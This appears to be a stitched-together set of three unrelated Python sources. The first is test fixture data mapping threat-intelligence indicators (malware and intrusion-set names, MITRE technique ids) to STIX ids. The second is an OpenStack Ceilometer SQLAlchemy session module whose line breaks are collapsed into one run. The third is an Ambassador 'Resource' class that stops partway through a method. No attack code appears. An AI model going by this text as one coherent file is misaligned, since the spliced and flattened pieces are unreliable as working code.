    {"type": "Intrusion Set", "value": "ATP12", 'fields': {"stixid": "4444"}},
    {"type": "Malware", "value": "RTM [Malware]", 'fields': {"stixid": "5555"}},
    {"type": "Malware", "value": "Machete [Malware]", 'fields': {"stixid": "6666"}},
    {"type": "Malware", "value": "ABK", 'fields': {"stixid": "7777"}},
    {"type": "Malware", "value": "Adups", 'fields': {"stixid": "8888"}},
    {"type": "Malware", "value": "4H RAT", 'fields': {"stixid": "9999"}},
    {"type": "Attack Pattern", "value": "Access Token", 'fields': {"stixid": "0000"}},
    {"type": "Tool", "value": "at", 'fields': {"stixid": "1212"}},
    {"type": "Course of Action", "value": "Account Use Policies", 'fields': {"stixid": "2323"}}
]

# Indicator lists before/after sub-technique renaming: sub-techniques
# (mitreid with a dot, e.g. T1254.001) get their parent technique's name
# prepended, per MITRE_ID_TO_MITRE_NAME below.
INDICATORS_LIST = [
    {"type": "Intrusion Set", "value": "RTM", "fields": {"mitreid": "T1111.111", "stixid": "1"}},
    {"type": "Intrusion Set", "value": "Machete", "fields": {"mitreid": "T1111", "stixid": "2"}},
    {"type": "Intrusion Set", "value": "APT1", "fields": {"mitreid": "T1251", "stixid": "3"}},
    {"type": "Intrusion Set", "value": "ATP12", "fields": {"mitreid": "T1259", "stixid": "4"}},
    {"type": "Malware", "value": "RTM [Malware]", "fields": {"mitreid": "T1256", "stixid": "5"}},
    {"type": "Attack Pattern", "value": "Machete 1", "fields": {"mitreid": "T1254", "stixid": "6"}},
    {"type": "Attack Pattern", "value": "ABK", "fields": {"mitreid": "T1789", "stixid": "7"}},
    {"type": "Attack Pattern", "value": "Adups", "fields": {"mitreid": "T1254.001", "stixid": "8"}},
    {"type": "Attack Pattern", "value": "4H RAT", "fields": {"mitreid": "T1254.002", "stixid": "9"}},
    {"type": "Attack Pattern", "value": "Access Token", "fields": {"mitreid": "T1789.001", "stixid": "10"}},
    {"type": "Tool", "value": "at", "fields": {"mitreid": "T7854", "stixid": "11"}},
    {"type": "Course of Action", "value": "Account Use Policies", "fields": {"mitreid": "T1250", "stixid": "12"}}
]

NEW_INDICATORS_LIST = [
    {"type": "Intrusion Set", "value": "RTM", "fields": {"mitreid": "T1111.111", "stixid": "1"}},
    {"type": "Intrusion Set", "value": "Machete", "fields": {"mitreid": "T1111", "stixid": "2"}},
    {"type": "Intrusion Set", "value": "APT1", "fields": {"mitreid": "T1251", "stixid": "3"}},
    {"type": "Intrusion Set", "value": "ATP12", "fields": {"mitreid": "T1259", "stixid": "4"}},
    {"type": "Malware", "value": "RTM [Malware]", "fields": {"mitreid": "T1256", "stixid": "5"}},
    {"type": "Attack Pattern", "value": "Machete 1", "fields": {"mitreid": "T1254", "stixid": "6"}},
    {"type": "Attack Pattern", "value": "ABK", "fields": {"mitreid": "T1789", "stixid": "7"}},
    {"type": "Attack Pattern", "value": "Machete 1: Adups", "fields": {"mitreid": "T1254.001", "stixid": "8"}},
    {"type": "Attack Pattern", "value": "Machete 1: 4H RAT", "fields": {"mitreid": "T1254.002", "stixid": "9"}},
    {"type": "Attack Pattern", "value": "ABK: Access Token", "fields": {"mitreid": "T1789.001", "stixid": "10"}},
    {"type": "Tool", "value": "at", "fields": {"mitreid": "T7854", "stixid": "11"}},
    {"type": "Course of Action", "value": "Account Use Policies", "fields": {"mitreid": "T1250", "stixid": "12"}}
]

# MITRE technique id -> technique name (parents and sub-techniques).
MITRE_ID_TO_MITRE_NAME = {
    "T1254": "Machete 1",
    "T1789": "ABK",
    "T1254.001": "Adups",
    "T1254.002": "4H RAT",
    "T1789.001": "Access Token"
}

# stixid -> indicator value, before and after the renaming pass.
OLD_ID_TO_NAME = {
    "1": "RTM",
    "2": "Machete",
    "3": "APT1",
    "4": "ATP12",
    "5": "RTM [Malware]",
    "6": "Machete 1",
    "7": "ABK",
    "8": "Machete 1: Adups",
    "9": "Machete 1: 4H RAT",
    "10": "ABK: Access Token",
    "11": "at",
    "12": "Account Use Policies",
}

NEW_ID_TO_NAME = {
    '1': 'RTM',
    '10': 'ABK: Access Token',
    '11': 'at',
    '12': 'Account Use Policies',
    '2': 'Machete',
    '3': 'APT1',
    '4': 'ATP12',
    '5': 'RTM [Malware]',
    '6': 'Machete 1',
    '7': 'ABK',
    '8': 'Machete 1: Adups',
    '9': 'Machete 1: 4H RAT'
}
# Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Session Handling for SQLAlchemy backend. Recommended ways to use sessions within this framework: * Don't use them explicitly; this is like running with ``AUTOCOMMIT=1``. `model_query()` will implicitly use a session when called without one supplied. This is the ideal situation because it will allow queries to be automatically retried if the database connection is interrupted. .. note:: Automatic retry will be enabled in a future patch. It is generally fine to issue several queries in a row like this. Even though they may be run in separate transactions and/or separate sessions, each one will see the data from the prior calls. If needed, undo- or rollback-like functionality should be handled at a logical level. For an example, look at the code around quotas and `reservation_rollback()`. Examples: .. code:: python def get_foo(context, foo): return (model_query(context, models.Foo). filter_by(foo=foo). first()) def update_foo(context, id, newfoo): (model_query(context, models.Foo). filter_by(id=id). update({'foo': newfoo})) def create_foo(context, values): foo_ref = models.Foo() foo_ref.update(values) foo_ref.save() return foo_ref * Within the scope of a single method, keep all the reads and writes within the context managed by a single session. 
In this way, the session's `__exit__` handler will take care of calling `flush()` and `commit()` for you. If using this approach, you should not explicitly call `flush()` or `commit()`. Any error within the context of the session will cause the session to emit a `ROLLBACK`. Database errors like `IntegrityError` will be raised in `session`'s `__exit__` handler, and any try/except within the context managed by `session` will not be triggered. And catching other non-database errors in the session will not trigger the ROLLBACK, so exception handlers should always be outside the session, unless the developer wants to do a partial commit on purpose. If the connection is dropped before this is possible, the database will implicitly roll back the transaction. .. note:: Statements in the session scope will not be automatically retried. If you create models within the session, they need to be added, but you do not need to call `model.save()`: .. code:: python def create_many_foo(context, foos): session = sessionmaker() with session.begin(): for foo in foos: foo_ref = models.Foo() foo_ref.update(foo) session.add(foo_ref) def update_bar(context, foo_id, newbar): session = sessionmaker() with session.begin(): foo_ref = (model_query(context, models.Foo, session). filter_by(id=foo_id). first()) (model_query(context, models.Bar, session). filter_by(id=foo_ref['bar_id']). update({'bar': newbar})) .. note:: `update_bar` is a trivially simple example of using ``with session.begin``. Whereas `create_many_foo` is a good example of when a transaction is needed, it is always best to use as few queries as possible. The two queries in `update_bar` can be better expressed using a single query which avoids the need for an explicit transaction. It can be expressed like so: .. code:: python def update_bar(context, foo_id, newbar): subq = (model_query(context, models.Foo.id). filter_by(id=foo_id). limit(1). subquery()) (model_query(context, models.Bar). filter_by(id=subq.as_scalar()). 
        update({'bar': newbar}))

For reference, this emits approximately the following SQL statement:

.. code:: sql

    UPDATE bar SET bar = ${newbar}
        WHERE id=(SELECT bar_id FROM foo WHERE id = ${foo_id} LIMIT 1);

.. note:: `create_duplicate_foo` is a trivially simple example of catching an
   exception while using ``with session.begin``. Here we create two duplicate
   instances with the same primary key; the exception must be caught outside
   of the context managed by a single session:

.. code:: python

    def create_duplicate_foo(context):
        foo1 = models.Foo()
        foo2 = models.Foo()
        foo1.id = foo2.id = 1
        session = sessionmaker()
        try:
            with session.begin():
                session.add(foo1)
                session.add(foo2)
        except exception.DBDuplicateEntry as e:
            handle_error(e)

* Passing an active session between methods. Sessions should only be passed
  to private methods. The private method must use a subtransaction; otherwise
  SQLAlchemy will throw an error when you call `session.begin()` on an
  existing transaction. Public methods should not accept a session parameter
  and should not be involved in sessions within the caller's scope.

  Note that this incurs more overhead in SQLAlchemy than the above means
  due to nesting transactions, and it is not possible to implicitly retry
  failed database operations when using this approach.

  This also makes code somewhat more difficult to read and debug, because a
  single database transaction spans more than one method. Error handling
  becomes less clear in this situation. When this is needed for code clarity,
  it should be clearly documented.

  .. code:: python

    def myfunc(foo):
        session = sessionmaker()
        with session.begin():
            # do some database things
            bar = _private_func(foo, session)
        return bar

    def _private_func(foo, session=None):
        if not session:
            session = sessionmaker()
        with session.begin(subtransaction=True):
            # do some other database things
        return bar

There are some things which it is best to avoid:

* Don't keep a transaction open any longer than necessary.
This means that your ``with session.begin()`` block should be as short as possible, while still containing all the related calls for that transaction. * Avoid ``with_lockmode('UPDATE')`` when possible. In MySQL/InnoDB, when a ``SELECT ... FOR UPDATE`` query does not match any rows, it will take a gap-lock. This is a form of write-lock on the "gap" where no rows exist, and prevents any other writes to that space. This can effectively prevent any INSERT into a table by locking the gap at the end of the index. Similar problems will occur if the SELECT FOR UPDATE has an overly broad WHERE clause, or doesn't properly use an index. One idea proposed at ODS Fall '12 was to use a normal SELECT to test the number of rows matching a query, and if only one row is returned, then issue the SELECT FOR UPDATE. The better long-term solution is to use ``INSERT .. ON DUPLICATE KEY UPDATE``. However, this can not be done until the "deleted" columns are removed and proper UNIQUE constraints are added to the tables. Enabling soft deletes: * To use/enable soft-deletes, the `SoftDeleteMixin` must be added to your model class. For example: .. code:: python class NovaBase(models.SoftDeleteMixin, models.ModelBase): pass Efficient use of soft deletes: * There are two possible ways to mark a record as deleted: `model.soft_delete()` and `query.soft_delete()`. The `model.soft_delete()` method works with a single already-fetched entry. `query.soft_delete()` makes only one db request for all entries that correspond to the query. * In almost all cases you should use `query.soft_delete()`. Some examples: .. code:: python def soft_delete_bar(): count = model_query(BarModel).find(some_condition).soft_delete() if count == 0: raise Exception("0 entries were soft deleted") def complex_soft_delete_with_synchronization_bar(session=None): if session is None: session = sessionmaker() with session.begin(subtransactions=True): count = (model_query(BarModel). find(some_condition). 
soft_delete(synchronize_session=True)) # Here synchronize_session is required, because we # don't know what is going on in outer session. if count == 0: raise Exception("0 entries were soft deleted") * There is only one situation where `model.soft_delete()` is appropriate: when you fetch a single record, work with it, and mark it as deleted in the same transaction. .. code:: python def soft_delete_bar_model(): session = sessionmaker() with session.begin(): bar_ref = model_query(BarModel).find(some_condition).first() # Work with bar_ref bar_ref.soft_delete(session=session) However, if you need to work with all entries that correspond to query and then soft delete them you should use the `query.soft_delete()` method: .. code:: python def soft_delete_multi_models(): session = sessionmaker() with session.begin(): query = (model_query(BarModel, session=session). find(some_condition)) model_refs = query.all() # Work with model_refs query.soft_delete(synchronize_session=False) # synchronize_session=False should be set if there is no outer # session and these entries are not used after this. When working with many rows, it is very important to use query.soft_delete, which issues a single query. Using `model.soft_delete()`, as in the following example, is very inefficient. .. code:: python for bar_ref in bar_refs: bar_ref.soft_delete(session=session) # This will produce count(bar_refs) db requests. 
""" import functools import logging import re import time import six from sqlalchemy import exc as sqla_exc from sqlalchemy.interfaces import PoolListener import sqlalchemy.orm from sqlalchemy.pool import NullPool, StaticPool from sqlalchemy.sql.expression import literal_column from ceilometer.openstack.common.db import exception from ceilometer.openstack.common.gettextutils import _LE, _LW from ceilometer.openstack.common import timeutils LOG = logging.getLogger(__name__) class SqliteForeignKeysListener(PoolListener): """Ensures that the foreign key constraints are enforced in SQLite. The foreign key constraints are disabled by default in SQLite, so the foreign key constraints will be enabled here for every database connection """ def connect(self, dbapi_con, con_record): dbapi_con.execute('pragma foreign_keys=ON') # note(boris-42): In current versions of DB backends unique constraint # violation messages follow the structure: # # sqlite: # 1 column - (IntegrityError) column c1 is not unique # N columns - (IntegrityError) column c1, c2, ..., N are not unique # # sqlite since 3.7.16: # 1 column - (IntegrityError) UNIQUE constraint failed: tbl.k1 # # N columns - (IntegrityError) UNIQUE constraint failed: tbl.k1, tbl.k2 # # postgres: # 1 column - (IntegrityError) duplicate key value violates unique # constraint "users_c1_key" # N columns - (IntegrityError) duplicate key value violates unique # constraint "name_of_our_constraint" # # mysql: # 1 column - (IntegrityError) (1062, "Duplicate entry 'value_of_c1' for key # 'c1'") # N columns - (IntegrityError) (1062, "Duplicate entry 'values joined # with -' for key 'name_of_our_constraint'") # # ibm_db_sa: # N columns - (IntegrityError) SQL0803N One or more values in the INSERT # statement, UPDATE statement, or foreign key update caused by a # DELETE statement are not valid because the primary key, unique # constraint or unique index identified by "2" constrains table # "NOVA.KEY_PAIRS" from having duplicate values for the 
index # key. _DUP_KEY_RE_DB = { "sqlite": (re.compile(r"^.*columns?([^)]+)(is|are)\s+not\s+unique$"), re.compile(r"^.*UNIQUE\s+constraint\s+failed:\s+(.+)$")), "postgresql": (re.compile(r"^.*duplicate\s+key.*\"([^\"]+)\"\s*\n.*$"),), "mysql": (re.compile(r"^.*\(1062,.*'([^\']+)'\"\)$"),), "ibm_db_sa": (re.compile(r"^.*SQL0803N.*$"),), } def _raise_if_duplicate_entry_error(integrity_error, engine_name): """Raise exception if two entries are duplicated. In this function will be raised DBDuplicateEntry exception if integrity error wrap unique constraint violation. """ def get_columns_from_uniq_cons_or_name(columns): # note(vsergeyev): UniqueConstraint name convention: "uniq_t0c10c2" # where `t` it is table name and columns `c1`, `c2` # are in UniqueConstraint. uniqbase = "uniq_" if not columns.startswith(uniqbase): if engine_name == "postgresql": return [columns[columns.index("_") + 1:columns.rindex("_")]] return [columns] return columns[len(uniqbase):].split("0")[1:] if engine_name not in ["ibm_db_sa", "mysql", "sqlite", "postgresql"]: return # FIXME(johannes): The usage of the .message attribute has been # deprecated since Python 2.6. However, the exceptions raised by # SQLAlchemy can differ when using unicode() and accessing .message. # An audit across all three supported engines will be necessary to # ensure there are no regressions. for pattern in _DUP_KEY_RE_DB[engine_name]: match = pattern.match(integrity_error.message) if match: break else: return # NOTE(mriedem): The ibm_db_sa integrity error message doesn't provide the # columns so we have to omit that from the DBDuplicateEntry error. 
columns = '' if engine_name != 'ibm_db_sa': columns = match.group(1) if engine_name == "sqlite": columns = [c.split('.')[-1] for c in columns.strip().split(", ")] else: columns = get_columns_from_uniq_cons_or_name(columns) raise exception.DBDuplicateEntry(columns, integrity_error) # NOTE(comstud): In current versions of DB backends, Deadlock violation # messages follow the structure: # # mysql: # (OperationalError) (1213, 'Deadlock found when trying to get lock; try ' # 'restarting transaction') <query_str> <query_args> _DEADLOCK_RE_DB = { "mysql": re.compile(r"^.*\(1213, 'Deadlock.*") } def _raise_if_deadlock_error(operational_error, engine_name): """Raise exception on deadlock condition. Raise DBDeadlock exception if OperationalError contains a Deadlock condition. """ re = _DEADLOCK_RE_DB.get(engine_name) if re is None: return # FIXME(johannes): The usage of the .message attribute has been # deprecated since Python 2.6. However, the exceptions raised by # SQLAlchemy can differ when using unicode() and accessing .message. # An audit across all three supported engines will be necessary to # ensure there are no regressions. m = re.match(operational_error.message) if not m: return raise exception.DBDeadlock(operational_error) def _wrap_db_error(f): @functools.wraps(f) def _wrap(self, *args, **kwargs): try: assert issubclass( self.__class__, sqlalchemy.orm.session.Session ), ('_wrap_db_error() can only be applied to methods of ' 'subclasses of sqlalchemy.orm.session.Session.') return f(self, *args, **kwargs) except UnicodeEncodeError: raise exception.DBInvalidUnicodeParameter() except sqla_exc.OperationalError as e: _raise_if_db_connection_lost(e, self.bind) _raise_if_deadlock_error(e, self.bind.dialect.name) # NOTE(comstud): A lot of code is checking for OperationalError # so let's not wrap it for now. raise # note(boris-42): We should catch unique constraint violation and # wrap it by our own DBDuplicateEntry exception. 
Unique constraint # violation is wrapped by IntegrityError. except sqla_exc.IntegrityError as e: # note(boris-42): SqlAlchemy doesn't unify errors from different # DBs so we must do this. Also in some tables (for example # instance_types) there are more than one unique constraint. This # means we should get names of columns, which values violate # unique constraint, from error message. _raise_if_duplicate_entry_error(e, self.bind.dialect.name) raise exception.DBError(e) except Exception as e: LOG.exception(_LE('DB exception wrapped.')) raise exception.DBError(e) return _wrap def _synchronous_switch_listener(dbapi_conn, connection_rec): """Switch sqlite connections to non-synchronous mode.""" dbapi_conn.execute("PRAGMA synchronous = OFF") def _add_regexp_listener(dbapi_con, con_record): """Add REGEXP function to sqlite connections.""" def regexp(expr, item): reg = re.compile(expr) return reg.search(six.text_type(item)) is not None dbapi_con.create_function('regexp', 2, regexp) def _thread_yield(dbapi_con, con_record): """Ensure other greenthreads get a chance to be executed. If we use eventlet.monkey_patch(), eventlet.greenthread.sleep(0) will execute instead of time.sleep(0). Force a context switch. With common database backends (eg MySQLdb and sqlite), there is no implicit yield caused by network I/O since they are implemented by C libraries that eventlet cannot monkey patch. """ time.sleep(0) def _ping_listener(engine, dbapi_conn, connection_rec, connection_proxy): """Ensures that MySQL and DB2 connections are alive. 
Borrowed from: http://groups.google.com/group/sqlalchemy/msg/a4ce563d802c929f """ cursor = dbapi_conn.cursor() try: ping_sql = 'select 1' if engine.name == 'ibm_db_sa': # DB2 requires a table expression ping_sql = 'select 1 from (values (1)) AS t1' cursor.execute(ping_sql) except Exception as ex: if engine.dialect.is_disconnect(ex, dbapi_conn, cursor): msg = _LW('Database server has gone away: %s') % ex LOG.warning(msg) # if the database server has gone away, all connections in the pool # have become invalid and we can safely close all of them here, # rather than waste time on checking of every single connection engine.dispose() # this will be handled by SQLAlchemy and will force it to create # a new connection and retry the original action raise sqla_exc.DisconnectionError(msg) else: raise def _set_session_sql_mode(dbapi_con, connection_rec, sql_mode=None): """Set the sql_mode session variable. MySQL supports several server modes. The default is None, but sessions may choose to enable server modes like TRADITIONAL, ANSI, several STRICT_* modes and others. Note: passing in '' (empty string) for sql_mode clears the SQL mode for the session, overriding a potentially set server default. """ cursor = dbapi_con.cursor() cursor.execute("SET SESSION sql_mode = %s", [sql_mode]) def _mysql_get_effective_sql_mode(engine): """Returns the effective SQL mode for connections from the engine pool. Returns ``None`` if the mode isn't available, otherwise returns the mode. """ # Get the real effective SQL mode. Even when unset by # our own config, the server may still be operating in a specific # SQL mode as set by the server configuration. # Also note that the checkout listener will be called on execute to # set the mode if it's registered. 
row = engine.execute("SHOW VARIABLES LIKE 'sql_mode'").fetchone() if row is None: return return row[1] def _mysql_check_effective_sql_mode(engine): """Logs a message based on the effective SQL mode for MySQL connections.""" realmode = _mysql_get_effective_sql_mode(engine) if realmode is None: LOG.warning(_LW('Unable to detect effective SQL mode')) return LOG.debug('MySQL server mode set to %s', realmode) # 'TRADITIONAL' mode enables several other modes, so # we need a substring match here if not ('TRADITIONAL' in realmode.upper() or 'STRICT_ALL_TABLES' in realmode.upper()): LOG.warning(_LW("MySQL SQL mode is '%s', " "consider enabling TRADITIONAL or STRICT_ALL_TABLES"), realmode) def _mysql_set_mode_callback(engine, sql_mode): if sql_mode is not None: mode_callback = functools.partial(_set_session_sql_mode, sql_mode=sql_mode) sqlalchemy.event.listen(engine, 'connect', mode_callback) _mysql_check_effective_sql_mode(engine) def _is_db_connection_error(args): """Return True if error in connecting to db.""" # NOTE(adam_g): This is currently MySQL specific and needs to be extended # to support Postgres and others. # For the db2, the error code is -30081 since the db2 is still not ready conn_err_codes = ('2002', '2003', '2006', '2013', '-30081') for err_code in conn_err_codes: if args.find(err_code) != -1: return True return False def _raise_if_db_connection_lost(error, engine): # NOTE(vsergeyev): Function is_disconnect(e, connection, cursor) # requires connection and cursor in incoming parameters, # but we have no possibility to create connection if DB # is not available, so in such case reconnect fails. # But is_disconnect() ignores these parameters, so it # makes sense to pass to function None as placeholder # instead of connection and cursor. 
if engine.dialect.is_disconnect(error, None, None): raise exception.DBConnectionError(error) def create_engine(sql_connection, sqlite_fk=False, mysql_sql_mode=None, idle_timeout=3600, connection_debug=0, max_pool_size=None, max_overflow=None, pool_timeout=None, sqlite_synchronous=True, connection_trace=False, max_retries=10, retry_interval=10): """Return a new SQLAlchemy engine.""" connection_dict = sqlalchemy.engine.url.make_url(sql_connection) engine_args = { "pool_recycle": idle_timeout, 'convert_unicode': True, } logger = logging.getLogger('sqlalchemy.engine') # Map SQL debug level to Python log level if connection_debug >= 100: logger.setLevel(logging.DEBUG) elif connection_debug >= 50: logger.setLevel(logging.INFO) else: logger.setLevel(logging.WARNING) if "sqlite" in connection_dict.drivername: if sqlite_fk: engine_args["listeners"] = [SqliteForeignKeysListener()] engine_args["poolclass"] = NullPool if sql_connection == "sqlite://": engine_args["poolclass"] = StaticPool engine_args["connect_args"] = {'check_same_thread': False} else: if max_pool_size is not None: engine_args['pool_size'] = max_pool_size if max_overflow is not None: engine_args['max_overflow'] = max_overflow if pool_timeout is not None: engine_args['pool_timeout'] = pool_timeout engine = sqlalchemy.create_engine(sql_connection, **engine_args) sqlalchemy.event.listen(engine, 'checkin', _thread_yield) if engine.name in ['mysql', 'ibm_db_sa']: ping_callback = functools.partial(_ping_listener, engine) sqlalchemy.event.listen(engine, 'checkout', ping_callback) if engine.name == 'mysql': if mysql_sql_mode: _mysql_set_mode_callback(engine, mysql_sql_mode) elif 'sqlite' in connection_dict.drivername: if not sqlite_synchronous: sqlalchemy.event.listen(engine, 'connect', _synchronous_switch_listener) sqlalchemy.event.listen(engine, 'connect', _add_regexp_listener) if connection_trace and engine.dialect.dbapi.__name__ == 'MySQLdb': _patch_mysqldb_with_stacktrace_comments() try: engine.connect() except 
sqla_exc.OperationalError as e: if not _is_db_connection_error(e.args[0]): raise remaining = max_retries if remaining == -1: remaining = 'infinite' while True: msg = _LW('SQL connection failed. %s attempts left.') LOG.warning(msg % remaining) if remaining != 'infinite': remaining -= 1 time.sleep(retry_interval) try: engine.connect() break except sqla_exc.OperationalError as e: if (remaining != 'infinite' and remaining == 0) or \ not _is_db_connection_error(e.args[0]): raise return engine class Query(sqlalchemy.orm.query.Query): """Subclass of sqlalchemy.query with soft_delete() method.""" def soft_delete(self, synchronize_session='evaluate'): return self.update({'deleted': literal_column('id'), 'updated_at': literal_column('updated_at'), 'deleted_at': timeutils.utcnow()}, synchronize_session=synchronize_session) class Session(sqlalchemy.orm.session.Session): """Custom Session class to avoid SqlAlchemy Session monkey patching.""" @_wrap_db_error def query(self, *args, **kwargs): return super(Session, self).query(*args, **kwargs) @_wrap_db_error def flush(self, *args, **kwargs): return super(Session, self).flush(*args, **kwargs) @_wrap_db_error def execute(self, *args, **kwargs): return super(Session, self).execute(*args, **kwargs) def get_maker(engine, autocommit=True, expire_on_commit=False): """Return a SQLAlchemy sessionmaker using the given engine.""" return sqlalchemy.orm.sessionmaker(bind=engine, class_=Session, autocommit=autocommit, expire_on_commit=expire_on_commit, query_cls=Query) def _patch_mysqldb_with_stacktrace_comments(): """Adds current stack trace as a comment in queries. Patches MySQLdb.cursors.BaseCursor._do_query. 
""" import MySQLdb.cursors import traceback old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query def _do_query(self, q): stack = '' for filename, line, method, function in traceback.extract_stack(): # exclude various common things from trace if filename.endswith('session.py') and method == '_do_query': continue if filename.endswith('api.py') and method == 'wrapper': continue if filename.endswith('utils.py') and method == '_inner': continue if filename.endswith('exception.py') and method == '_wrap': continue # db/api is just a wrapper around db/sqlalchemy/api if filename.endswith('db/api.py'): continue # only trace inside ceilometer index = filename.rfind('ceilometer') if index == -1: continue stack += "File:%s:%s Method:%s() Line:%s | " \ % (filename[index:], line, method, function) # strip trailing " | " from stack if stack: stack = stack[:-3] qq = "%s /* %s */" % (q, stack) else: qq = q old_mysql_do_query(self, qq) setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query) class EngineFacade(object): """A helper class for removing of global engine instances from ceilometer.db. As a library, ceilometer.db can't decide where to store/when to create engine and sessionmaker instances, so this must be left for a target application. On the other hand, in order to simplify the adoption of ceilometer.db changes, we'll provide a helper class, which creates engine and sessionmaker on its instantiation and provides get_engine()/get_session() methods that are compatible with corresponding utility functions that currently exist in target projects, e.g. in Nova. engine/sessionmaker instances will still be global (and they are meant to be global), but they will be stored in the app context, rather that in the ceilometer.db context. Note: using of this helper is completely optional and you are encouraged to integrate engine/sessionmaker instances into your apps any way you like (e.g. one might want to bind a session to a request context). 
Two important things to remember: 1. An Engine instance is effectively a pool of DB connections, so it's meant to be shared (and it's thread-safe). 2. A Session instance is not meant to be shared and represents a DB transactional context (i.e. it's not thread-safe). sessionmaker is a factory of sessions. """ def __init__(self, sql_connection, sqlite_fk=False, autocommit=True, expire_on_commit=False, **kwargs): """Initialize engine and sessionmaker instances. :param sqlite_fk: enable foreign keys in SQLite :type sqlite_fk: bool :param autocommit: use autocommit mode for created Session instances :type autocommit: bool :param expire_on_commit: expire session objects on commit :type expire_on_commit: bool Keyword arguments: :keyword mysql_sql_mode: the SQL mode to be used for MySQL sessions. (defaults to TRADITIONAL) :keyword idle_timeout: timeout before idle sql connections are reaped (defaults to 3600) :keyword connection_debug: verbosity of SQL debugging information. 0=None, 100=Everything (defaults to 0) :keyword max_pool_size: maximum number of SQL connections to keep open in a pool (defaults to SQLAlchemy settings) :keyword max_overflow: if set, use this value for max_overflow with sqlalchemy (defaults to SQLAlchemy settings) :keyword pool_timeout: if set, use this value for pool_timeout with sqlalchemy (defaults to SQLAlchemy settings) :keyword sqlite_synchronous: if True, SQLite uses synchronous mode (defaults to True) :keyword connection_trace: add python stack traces to SQL as comment strings (defaults to False) :keyword max_retries: maximum db connection retries during startup. 
(setting -1 implies an infinite retry count) (defaults to 10) :keyword retry_interval: interval between retries of opening a sql connection (defaults to 10) """ super(EngineFacade, self).__init__() self._engine = create_engine( sql_connection=sql_connection, sqlite_fk=sqlite_fk, mysql_sql_mode=kwargs.get('mysql_sql_mode', 'TRADITIONAL'), idle_timeout=kwargs.get('idle_timeout', 3600), connection_debug=kwargs.get('connection_debug', 0), max_pool_size=kwargs.get('max_pool_size'), max_overflow=kwargs.get('max_overflow'), pool_timeout=kwargs.get('pool_timeout'), sqlite_synchronous=kwargs.get('sqlite_synchronous', True), connection_trace=kwargs.get('connection_trace', False), max_retries=kwargs.get('max_retries', 10), retry_interval=kwargs.get('retry_interval', 10)) self._session_maker = get_maker( engine=self._engine, autocommit=autocommit, expire_on_commit=expire_on_commit) def get_engine(self): """Get the engine instance (note, that it's shared).""" return self._engine def get_session(self, **kwargs): """Get a Session instance. If passed, keyword arguments values override the ones used when the sessionmaker instance was created. :keyword autocommit: use autocommit mode for created Session instances :type autocommit: bool :keyword expire_on_commit: expire session objects on commit :type expire_on_commit: bool """ for arg in kwargs: if arg not in ('autocommit', 'expire_on_commit'): del kwargs[arg] return self._session_maker(**kwargs) @classmethod def from_config(cls, connection_string, conf, sqlite_fk=False, autocommit=True, expire_on_commit=False): """Initialize EngineFacade using oslo.config config instance options. 
:param connection_string: SQLAlchemy connection string :type connection_string: string :param conf: oslo.config config instance :type conf: oslo.config.cfg.ConfigOpts :param sqlite_fk: enable foreign keys in SQLite :type sqlite_fk: bool :param autocommit: use autocommit mode for created Session instances :type autocommit: bool :param expire_on_commit: expire session objects on commit :type expire_on_commit: bool """ return cls(sql_connection=connection_string, sqlite_fk=sqlite_fk, autocommit=autocommit, expire_on_commit=expire_on_commit, **dict(conf.database.items()))
import sys

from typing import Any, Dict, List, Optional, Type, TypeVar
import json

from .utils import parse_yaml, dump_json

from .cache import Cacheable

# Bound type variable so classmethod constructors return the subclass type.
R = TypeVar('R', bound='Resource')


class Resource (Cacheable):
    """
    A resource that's part of the overall Ambassador configuration world. This is
    the base class for IR resources, Ambassador-config resources, etc.

    Elements in a Resource:
    - rkey is a short identifier that is used as the primary key for _all_ the
    Ambassador classes to identify this single specific resource. It should be
    something like "ambassador-default.1" or the like: very specific, doesn't
    have to be fun for humans.

    - location is a more human-readable string describing where the human should
    go to find the source of this resource. "Service ambassador, namespace default,
    object 1". This isn't really used by the Config class, but the Diagnostics class
    makes heavy use of it.

    - kind (keyword-only) is what kind of Ambassador resource this is.

    - serialization (keyword-only) is the _original input serialization_, if we have
    it, of the object. If we don't have it, this should be None -- don't just serialize
    the object to no purpose.

    - any additional keyword arguments are saved in the Resource.

    :param rkey: unique identifier for this source, should be short
    :param location: where should a human go to find the source of this resource?
    :param kind: what kind of thing is this?
    :param serialization: original input serialization of obj, if we have it
    :param kwargs: key-value pairs that form the data object for this resource
    """

    # These are stored through Cacheable (dict-like: see as_dict's dict(self)),
    # with attribute access delegated via __getattr__/__setattr__ below.
    rkey: str
    location: str
    kind: str
    serialization: Optional[str]

    # _errors: List[RichStatus]
    _errored: bool
    _referenced_by: Dict[str, 'Resource']

    def __init__(self, rkey: str, location: str, *,
                 kind: str,
                 serialization: Optional[str]=None,
                 **kwargs) -> None:

        if not rkey:
            raise Exception("Resource requires rkey")

        if not kind:
            raise Exception("Resource requires kind")

        # print("Resource __init__ (%s %s)" % (kind, name))

        super().__init__(rkey=rkey, location=location,
                         kind=kind, serialization=serialization,
                         # _errors=[],
                         _referenced_by={},
                         **kwargs)

    def sourced_by(self, other: 'Resource') -> None:
        # Re-home this resource: take the identity/location of `other`.
        self.rkey = other.rkey
        self.location = other.location

    def referenced_by(self, other: 'Resource') -> None:
        # Keyed by location, not rkey, so lookups in is_referenced_by match.
        # print("%s %s REF BY %s %s" % (self.kind, self.name, other.kind, other.rkey))
        self._referenced_by[other.location] = other

    def is_referenced_by(self, other_location) -> Optional['Resource']:
        # Returns the referencing Resource, or None if no such reference.
        return self._referenced_by.get(other_location, None)

    def __getattr__(self, key: str) -> Any:
        # Attribute access falls through to item access on the underlying
        # mapping; missing keys surface as AttributeError as usual.
        try:
            return self[key]
        except KeyError:
            raise AttributeError(key)

    def __setattr__(self, key: str, value: Any) -> None:
        # Mirror of __getattr__: every attribute assignment is an item write.
        self[key] = value

    def __str__(self) -> str:
        return("<%s %s>" % (self.kind, self.rkey))

    def as_dict(self) -> Dict[str, Any]:
        # Shallow copy of the data payload, with bookkeeping keys stripped.
        ad = dict(self)

        ad.pop('rkey', None)
        ad.pop('serialization', None)
        ad.pop('location', None)
        ad.pop('_referenced_by', None)
        ad.pop('_errored', None)

